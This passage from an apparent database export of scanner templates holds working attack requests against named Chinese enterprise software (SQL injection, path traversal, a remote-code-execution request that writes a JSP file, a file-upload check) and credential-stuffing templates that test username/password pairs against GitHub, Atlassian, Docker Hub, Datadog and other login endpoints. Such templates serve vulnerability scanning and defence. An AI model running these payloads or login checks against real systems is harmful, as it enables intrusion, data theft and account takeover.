\"think_lang=..%2F..%2F..%2F..%2F\"\n\n - type: word\n part: body_3\n words:\n - \"CONFIGURATION\"\n - \"Successfully created\"\n condition: and\n\n# digest: 4a0a00473045022061630427dd72328900e8eb0f4d67c91f2c826690524c1c973c1cfe5b64400926022100c6c345fd5fbcc3038eaec942397faf5b9658b328bbb421f95eb3d2146d7f0cd7:922c64590222798bb761d5b6d8e72950\n", "hash": "209f6820ae6bbce607c199b438ee2cad", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e23" }, "name": "CNVD-2023-08743.yaml", "content": "id: CNVD-2023-08743\n\ninfo:\n name: Hongjing Human Resource Management System - SQL Injection\n author: SleepingBag945\n severity: critical\n description: There is a SQL injection vulnerability in the categories of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information.\n reference:\n - https://www.henry4e36.top/index.php/archives/162.html\n - https://blog.csdn.net/qq_41904294/article/details/130944159\n metadata:\n verified: true\n max-request: 1\n fofa-query: title=\"人力资源信息管理系统\"\n tags: cnvd2023,cnvd,hongjing,hcm,sqli\n\nhttp:\n - raw:\n - |\n GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(header,\"text/xml\")'\n - 'contains_all(body,\"TreeNode id=\\\"hongjing\",\"SQL Server\")'\n condition: and\n# digest: 4a0a00473045022059810b4634d6fa7f6cce54d1ed52789c775deae48194b5929fdbe72f748f6909022100f7d9a0278a803bf1b29c9f178435623abb03589ec17bc66a88c2f1366ef5d642:922c64590222798bb761d5b6d8e72950", "hash": "6aed01711b9edb9ef34948f27d094e65", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e24" }, "name": "CNVD-2023-12632.yaml", "content": "id: CNVD-2023-12632\n\ninfo:\n name: E-Cology V9 - SQL Injection\n author: daffainfo\n severity: high\n description: |\n Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.\n reference:\n - https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003\n - https://blog.csdn.net/qq_50854662/article/details/129992329\n metadata:\n verified: true\n max-request: 1\n shodan-query: 'ecology_JSessionid'\n fofa-query: app=\"泛微-协同商务系统\"\n tags: cnvd,cnvd2023,ecology,sqli\n\n# a' union select 1,''+(SELECT md5(9999999))+'\n# URL encoded 3 times\nhttp:\n - raw:\n - |\n POST /mobile/plugin/browser.jsp HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '283f42764da6dba2522412916b031080'\n - '\"autoCount\"'\n - '\"autoGet\"'\n condition: and\n\n - type: status\n status:\n - 200\n\n# digest: 4a0a00473045022100ac8d7d77e7fc71d72ed50693564d11a326afd1e25d223a0089bea19f7f2776370220530d4c64341f3cb397f5a7765569d5d626dbf4a0b8d114ef8c9ad1af078f1061:922c64590222798bb761d5b6d8e72950\n", "hash": "328e9b111ba4ed9debd38b6ad7a5aa84", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e25" }, "name": "CNVD-2023-96945.yaml", "content": "id: CNVD-2023-96945\n\ninfo:\n name: McVie Safety Digital Management Platform - Arbitrary File Upload\n author: DhiyaneshDk\n severity: high\n description: |\n Jiangsu Maiwei Intelligent Technology Co., Ltd. is a software technology service provider focusing on customized development of software products. There is a file upload vulnerability in Jiangsu Maiwei Intelligent Technology Co., Ltd.'s safe production digital management platform. An attacker can use this vulnerability to gain server permissions.\n reference:\n - https://blog.csdn.net/weixin_42628854/article/details/136036109\n metadata:\n verified: true\n max-request: 1\n fofa-query: \"安全生产数字化管理平台\"\n tags: cnvd,cnvd2023,file-upload,mcvie\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Content/Plugins/uploader/FileChoose.html\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"选择文件\"\n - \"提交\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d33058dc7925d488f441ffb20666552cfa61013c0e48bcd8629a20e46433b5c1022071721f25284dce9bbcfbf4c5b64289209d5deb92805c05fa23d9e5291b7a39f0:922c64590222798bb761d5b6d8e72950", "hash": "c52b3b8ac832c680f87dbd6c3fad0ac8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e26" }, "name": "CNVD-C-2023-76801.yaml", "content": "id: CNVD-C-2023-76801\n\ninfo:\n name: UFIDA NC uapjs - RCE vulnerability\n author: SleepingBag945\n severity: critical\n description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.\n metadata:\n max-request: 2\n tags: cnvd,cnvd2023,yonyou,rce,intrusive\n\nhttp:\n - raw:\n - |\n POST /uapjs/jsinvoke/?action=invoke HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded;charset=UTF-8\n\n {\"serviceName\":\"nc.itf.iufo.IBaseSPService\",\"methodName\":\"saveXStreamConfig\",\n \"parameterTypes\":[\"java.lang.Object\",\"java.lang.String\"],\n \"parameters\":[\"{{randstr_2}}\",\"webapps/nc_web/{{randstr_1}}.jsp\"]}\n - |\n GET /{{randstr_1}}.jsp HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_1 == 200\n - status_code_2 == 200 && contains(body_2,\"{{randstr_2}}\")\n condition: and\n\n# digest: 4b0a00483046022100998225dae1eaa205075155ab10edbd8b2dbae58d976e5d4415f662ccd76ec102022100dafe4c8d3a42c6210d8e7847658fa39c5828b806052a30c28d09e00669e864bb:922c64590222798bb761d5b6d8e72950\n", "hash": "fab30ed1ecc13e7deed309c5f520fd92", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e27" }, "name": "atechmedia-codebase-login-check.yaml", "content": "id: atechmedia-codebase-login-check\n\ninfo:\n name: Atechmedia/Codebase Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid Atechmedia/Codebase account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 2\n tags: cloud,creds-stuffing,login-check,atechmedia,codebase\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n GET https://identity.atechmedia.com/login HTTP/1.1\n Host: identity.atechmedia.com\n Referer: https://identity.atechmedia.com/login\n - |\n POST https://identity.atechmedia.com/login HTTP/1.1\n Host: identity.atechmedia.com\n Origin: https://identity.atechmedia.com\n Content-Type: application/x-www-form-urlencoded\n Referer: https://identity.atechmedia.com/login\n\n utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login\n\n extractors:\n - type: xpath\n name: authenticity_token\n part: body\n attribute: value\n internal: true\n xpath:\n - /html/body/div/div[2]/div/form/input[2]\n\n - type: dsl\n dsl:\n - username\n - password\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'Set-Cookie: user_session'\n\n - type: status\n status:\n - 302\n# digest: 4b0a00483046022100b6260850c8884a11dfab10badc50eca9b785dc2db129f54b76e9605d49a30ebd0221009c6a4578217807fba1884a34be4e6e00b9d627a71fb62fd024876cee11219fe7:922c64590222798bb761d5b6d8e72950", "hash": "9c2d3020f7f51a862b6133c645b081fc", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e28" }, "name": "atlassian-login-check.yaml", "content": "id: atlassian-login-check\n\ninfo:\n name: Atlassian Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid atlassian account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n tags: cloud,creds-stuffing,login-check,atlassian\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n POST https://auth.atlassian.com/co/authenticate HTTP/1.1\n Host: auth.atlassian.com\n Content-Type: application/json\n Origin: https://id.atlassian.com\n Referer: https://id.atlassian.com/\n\n {\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"state\":{\"csrfToken\":\"{{rand_text_alpha(10, \"\")}}\"}}\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n attack: pitchfork\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"error_description\":\"Wrong email or password.\"'\n\n - type: status\n status:\n - 403\n# digest: 4a0a0047304502210083c73505e66eaf278170bb782317370fa97a3e1415caebb9641f7632b44303c802207bda547ec71a5e97a812ea525a5f3f0217bd34d60c77ef3d1782c8da03c57192:922c64590222798bb761d5b6d8e72950", "hash": "3741d64b0e3b4cc37f0a133ad7a3998f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e29" }, "name": "avnil-pdf-generator-check.yaml", "content": "id: avnil-pdf-generator-check\n\ninfo:\n name: useanvil.com Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid avnil pdf generator account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n tags: cloud,creds-stuffing,login-check,avnil-pdf\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n POST https://graphql.useanvil.com/ HTTP/1.1\n Host: graphql.useanvil.com\n Content-Length: 367\n Content-Type: application/json\n\n {\"operationName\":\"LoginMutation\",\"variables\":{\"email\":\"{{username}}\",\"password\":\"{{password}}\"},\"query\":\"mutation LoginMutation($email: String, $password: String) {\\n login(email: $email, password: $password) {\\n eid\\n firstName\\n lastName\\n email\\n preferences {\\n require2FA\\n __typename\\n }\\n extra\\n __typename\\n }\\n}\\n\"}\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"email\":\"'\n - '\"eid\":\"'\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206b4fbc67413049130a87be6c047ed7ae4cb323da4b195608526619668e467272022100986ad99ae0c941bfef37cbd6df9fa30798f45445eaf38a1be2696c142122e7a0:922c64590222798bb761d5b6d8e72950", "hash": "c804c332603e2cf7ead9d6bc34e94a21", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e2a" }, "name": "chefio-login-check.yaml", "content": "id: chefio-login-check\n\ninfo:\n name: Chef.io Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid chef.io account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n tags: cloud,creds-stuffing,login-check,chefio\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n POST https://api.chef.io/login HTTP/1.1\n Host: api.chef.io\n Content-Type: application/x-www-form-urlencoded\n\n utf8=%E2%9C%93&authenticity_token=&authenticity_token=&to=https://api.chef.io/login-success&username={{username}}&password={{password}}&commit=Sign+In\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'Location: https://api.chef.io/login-success'\n\n - type: status\n status:\n - 302\n# digest: 490a0046304402200a063ef899b05c8a1eb9e1d206605e6dbd609a21cfec53f816ce7182be3f96440220724acc9b86e65591636033b6723c4f84a8100ee1658147dae30e6e577180faae:922c64590222798bb761d5b6d8e72950", "hash": "653d7eac9ccdcc83aeb03a77281cf73a", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e2b" }, "name": "codepen-login-check.yaml", "content": "id: codepen-login-check\n\ninfo:\n name: codepen.io Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid codepen account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 2\n tags: creds-stuffing,login-check,cloud,codepen\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n GET https://codepen.io/login HTTP/1.1\n Host: codepen.io\n - |\n POST https://codepen.io/login/login HTTP/1.1\n Host: codepen.io\n Content-Type: application/x-www-form-urlencoded\n X-CSRF-Token: {{token}}\n\n authenticity_token={{token}}&email={{username}}&password={{password}}&login-type=fullpage\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n\n - type: xpath\n part: body\n xpath:\n - '//input[@name=\"authenticity_token\"]/@value'\n name: token\n internal: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n negative: true\n words:\n - 'The username or password you entered is incorrect, please try again.'\n\n - type: status\n status:\n - 302\n# digest: 4a0a004730450220240c8ccd616b07ac1a9d8fb6349109ecb6d2f59c9e971f041a9f4dc8651ce4ee022100c147a0c19edbc873bfa37c680e3b60c60889eae68fc595aafb1953abe5b8ecb5:922c64590222798bb761d5b6d8e72950", "hash": "bdd0e1aa88e926a6d66d92317b791846", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e2c" }, "name": "datadog-login-check.yaml", "content": "id: datadog-login-check\n\ninfo:\n name: Datadog Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid datadog account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 2\n tags: cloud,creds-stuffing,login-check,datadog\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n GET https://app.datadoghq.com/account/login HTTP/1.1\n Host: app.datadoghq.com\n - |\n POST https://app.datadoghq.com/account/login? HTTP/1.1\n Host: app.datadoghq.com\n Content-Type: application/x-www-form-urlencoded\n\n _authentication_token={{auth_token}}&username={{username}}&password={{password}}\n\n extractors:\n - type: regex\n name: auth_token\n part: body\n internal: true\n group: 1\n regex:\n - \"authentication_token": "(.*?)",\"\n\n - type: dsl\n dsl:\n - username\n - password\n attack: pitchfork\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'Set-Cookie: dogweb='\n\n - type: status\n status:\n - 302\n# digest: 4b0a00483046022100aa2b6771fbb1038da3c1c37c928dede765fa0708b531d3286a84fb51a02df60d022100ee5cf0d2eb452ee533d1bb2cdb5f52a8061c386ef5d491481bcba4dcd58ae228:922c64590222798bb761d5b6d8e72950", "hash": "97e204366376d23bed26a89d7dc0b733", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e2d" }, "name": "docker-hub-login-check.yaml", "content": "id: docker-hub-login-check\n\ninfo:\n name: Docker Hub Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid Docker Hub account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n tags: creds-stuffing,login-check,cloud,docker\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n POST https://hub.docker.com/v2/users/login HTTP/1.1\n Host: hub.docker.com\n Content-Type: application/json\n\n {\n \"username\": \"{{username}}\",\n \"password\": \"{{password}}\"\n }\n\n threads: 30\n attack: pitchfork\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'token'\n\n - type: word\n part: header\n words:\n - 'Set-Cookie: token='\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n# digest: 490a004630440220745f50f1f9929bf2e910c2ffa2181ee5d12847b0c2c17fe255f2e126c6a2c0e0022009c805748a4019d0469aad7016648e5a312bbc81c14d8ea16b25bc68da02f1e9:922c64590222798bb761d5b6d8e72950", "hash": "03143beffdc027d21baafe61600d91e8", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e2e" }, "name": "gitea-login-check.yaml", "content": "id: gitea-login-check\n\ninfo:\n name: gitea.com Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid gitea account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n tags: cloud,creds-stuffing,login-check,gitea\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n POST https://gitea.com/user/login HTTP/1.1\n Host: gitea.com\n Content-Type: application/x-www-form-urlencoded\n\n user_name={{username}}&password={{password}}\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'Location: /'\n\n - type: status\n status:\n - 303\n# digest: 480a00453043021f44ce0e3314926c5c7af6fac3a4007b5bff8bd3d74bbab5a01650ce416c23b702203adeef088e9527e141d289583f052f2d714a593f89a3e49f36a9e5fdcf321779:922c64590222798bb761d5b6d8e72950", "hash": "07422605429264029ed964423dbb4e4f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e2f" }, "name": "github-login-check.yaml", "content": "id: github-login-check\n\ninfo:\n name: Github Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid github account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 2\n tags: cloud,creds-stuffing,login-check,github\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n GET https://github.com/login HTTP/1.1\n Host: github.com\n - |\n POST https://github.com/session HTTP/1.1\n Host: github.com\n Origin: https://github.com\n Content-Type: application/x-www-form-urlencoded\n Referer: https://github.com/login\n\n commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}}\n\n extractors:\n - type: xpath\n name: authenticity_token\n part: body\n attribute: value\n internal: true\n xpath:\n - /html/body/div[3]/main/div/div[4]/form/input[1]\n\n - type: xpath\n name: timestamp\n part: body\n attribute: value\n internal: true\n xpath:\n - /html/body/div[3]/main/div/div[4]/form/div/input[10]\n\n - type: xpath\n name: timestamp_secret\n part: body\n attribute: value\n internal: true\n xpath:\n - /html/body/div[3]/main/div/div[4]/form/div/input[11]\n\n - type: dsl\n dsl:\n - username\n - password\n\n matchers-condition: or\n matchers:\n - type: dsl\n name: 2fa\n dsl:\n - \"contains(location, 'https://github.com/sessions/two-factor')\"\n - \"status_code==302\"\n condition: and\n\n - type: dsl\n dsl:\n - \"contains(to_lower(header), 'set-cookie: logged_in=yes')\"\n - \"contains(to_lower(header), 'set-cookie: user_session=')\"\n - \"status_code==302\"\n condition: and\n# digest: 490a00463044022032da6a74ed4e674bc4b66b66765724ee259c4df8ef05e9bc98de8ccc3f4ebfd202205a0376f01efcde43398c419330041e7fe45717e8ad8c3bf457c79739f730617a:922c64590222798bb761d5b6d8e72950", "hash": "0912eb21c4eeeafc330ca707f8acd486", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e30" }, "name": "postman-login-check.yaml", "content": "id: postman-login-check\n\ninfo:\n name: Postman Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid postman account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 2\n tags: cloud,creds-stuffing,login-check,postman\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n GET https://identity.getpostman.com/login HTTP/1.1\n Host: identity.getpostman.com\n Referer: https://identity.getpostman.com/accounts\n - |\n POST https://identity.getpostman.com/login HTTP/1.1\n Host: identity.getpostman.com\n Content-Type: application/json;charset=UTF-8\n X-Csrf-Token: {{csrfToken}}\n Origin: https://identity.getpostman.com\n Referer: https://identity.getpostman.com/login\n\n {\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n attack: pitchfork\n\n extractors:\n - type: xpath\n name: csrfToken\n part: body\n attribute: value\n internal: true\n xpath:\n - /html/body/div/div/div[1]/form/input\n\n - type: dsl\n dsl:\n - username\n - password\n matchers:\n - type: dsl\n dsl:\n - \"contains(to_lower(header), 'set-cookie: getpostmanlogin=yes')\"\n - \"contains(to_lower(body), 'identity.postman.co/continue')\"\n - \"status_code==200\"\n condition: and\n# digest: 490a0046304402203e8ec08f17a12d6d7a2b85a1feaee01c10d0a6940e2d44329e6a2d37af063390022057aeeb47cc9661399ce85b26e148ebcde995d2e54975ec322d4edad4184bc9ac:922c64590222798bb761d5b6d8e72950", "hash": "2805cf1330a788b070cfaf6fb1c16a52", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e31" }, "name": "pulmi-login-check.yaml", "content": "id: pulmi-login-check\n\ninfo:\n name: pulmi.com Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid github account.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n tags: cloud,creds-stuffing,login-check,pulmi\n\nself-contained: true\n\nhttp:\n - raw:\n - |\n POST https://api.pulumi.com/api/console/email/login HTTP/1.1\n Host: api.pulumi.com\n Content-Type: application/json\n Origin: https://app.pulumi.com\n Referer: https://app.pulumi.com/\n\n {\"emailOrLogin\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - pulumiAccessToken\n - userInfo\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202cfeb85946995474986c795d6a8ad6bbd6c384973bcb4b7f392c275a5c898bf002205dd88d6ad113c4818b82b56baf67c624ff07f2f09875185ae066dd9af16560e0:922c64590222798bb761d5b6d8e72950", "hash": "078880fd00f5b6124c16aabfd528c1b0", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e32" }, "name": "gitlab-login-check-self-hosted.yaml", "content": "id: gitlab-login-check-self-hosted\n\ninfo:\n name: Gitlab Login Check Self Hosted\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid login on self hosted GitLab instance.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 2\n shodan-query: product:\"GitLab Self-Managed\"\n fofa-query: product=\"GitLab\"\n tags: creds-stuffing,login-check,self-hosted,gitlab\nvariables:\n username: \"{{username}}\"\n password: \"{{password}}\"\n\nhttp:\n - raw:\n - |\n GET /users/sign_in HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /users/sign_in HTTP/1.1\n Host: {{Hostname}}\n Cache-Control: max-age=0\n Origin: {{BaseURL}}\n DNT: 1\n Content-Type: application/x-www-form-urlencoded\n Referer: {{BaseURL}}/users/sign_in\n Accept-Language: en-US,en;q=0.9,de;q=0.8\n\n authenticity_token={{url_encode(authenticity_token)}}&user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&user%5Bremember_me%5D=0\n\n attack: pitchfork\n\n extractors:\n - type: regex\n part: body\n internal: true\n name: authenticity_token\n group: 1\n regex:\n - '\"/users/sign_in\".*?authenticity_token\"\\s+value=\"([^\"]+)\"'\n\n - type: dsl\n dsl:\n - username\n - password\n matchers:\n - type: dsl\n dsl:\n - status_code_2 == 302\n - '!contains(to_lower(body_2), \"invalid login\")'\n condition: and\n# digest: 4a0a004730450221009d296a685fb32afc2b238155a03f8f694a9309300972b3a5c437e04f21be3b2d022008d402c88300f6ff469a65c127a2966dcc346930bf46d0516df78c4bdbcdab72:922c64590222798bb761d5b6d8e72950", "hash": "9276f55635cec216d83a4b760b58e4a2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e33" }, "name": "grafana-login-check.yaml", "content": "id: grafana-login-check\n\ninfo:\n name: Grafana Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid login on self hosted Grafana instance.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n shodan-query: title:\"Grafana\"\n fofa-query: title=\"Grafana\"\n tags: self-hosted,creds-stuffing,login-check,grafana\nvariables:\n username: \"{{username}}\"\n password: \"{{password}}\"\n\nhttp:\n - raw:\n - |\n POST /login HTTP/1.1\n Host: {{Hostname}}\n accept: application/json, text/plain, */*\n DNT: 1\n content-type: application/json\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/login\n Cookie: redirect_to=%2F\n\n {\"user\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Logged in'\n\n - type: word\n part: header\n words:\n - 'grafana_session'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a3f034e7179bdf079b1dc2684546e0aed572c531bfde778a670188f30ca5394d022100b2af74dbd182c70308b657aa3c1481e2b815a5c98dc49d5471f66cd4d4ccf527:922c64590222798bb761d5b6d8e72950", "hash": "a7a70e40d09c8b380c827c0c5bc17c4d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e34" }, "name": "jira-login-check.yaml", "content": "id: jira-login-check\n\ninfo:\n name: Jira Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid login on self hosted Jira instance.\n reference:\n - https://owasp.org/www-community/attacks/Credential_stuffing\n metadata:\n max-request: 1\n shodan-query: http.component:\"Atlassian Jira\"\n fofa-query: product=\"JIRA\"\n tags: creds-stuffing,login-check,self-hosted,jira\nvariables:\n username: \"{{username}}\"\n password: \"{{password}}\"\n\nhttp:\n - raw:\n - |\n POST /rest/gadget/1.0/login HTTP/1.1\n Host: {{Hostname}}\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n Connection: close\n\n os_username={{username}}&os_password={{password}}\n\n extractors:\n - type: dsl\n dsl:\n - username\n - password\n attack: pitchfork\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"loginSucceeded\":true'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f8ccb2fa2c256c05034ec98bcbf0ffa455795dfc04126caff69c12c4ab24c8df022100874e434186b1f2974afe1caa1e13566b68c1efa5be27faa471186b1bc1fd8c91:922c64590222798bb761d5b6d8e72950", "hash": "63e257486d0fd1062272251759e6985a", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e35" }, "name": "CVE-2000-0114.yaml", "content": "id: CVE-2000-0114\n\ninfo:\n name: Microsoft FrontPage Extensions Check (shtml.dll)\n author: r3naissance\n severity: medium\n description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.\n impact: |\n High: Remote code execution or denial of service.\n remediation: Upgrade to the latest version.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2000-0114\n - https://www.exploit-db.com/exploits/19897\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-2000-0114\n - https://github.com/0xPugazh/One-Liners\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2000-0114\n cwe-id: NVD-CWE-Other\n epss-score: 0.15958\n epss-percentile: 0.95829\n cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microsoft\n product: internet_information_server\n tags: cve,cve2000,frontpage,microsoft,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/_vti_inf.html'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"_vti_bin/shtml.dll\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f18bd6804b42bce98cc02cea3261854e17f9d58bcb7034e2dc7289c456c57c0d022100d91840b613c0b2544a15e2ae802e176fea630dee4788fe64c5e40f9082bc1374:922c64590222798bb761d5b6d8e72950", "hash": "4ed87f7b064417908a2204daa9323565", "level": 4, "time": "2024-05-17 23:39:44" }, { 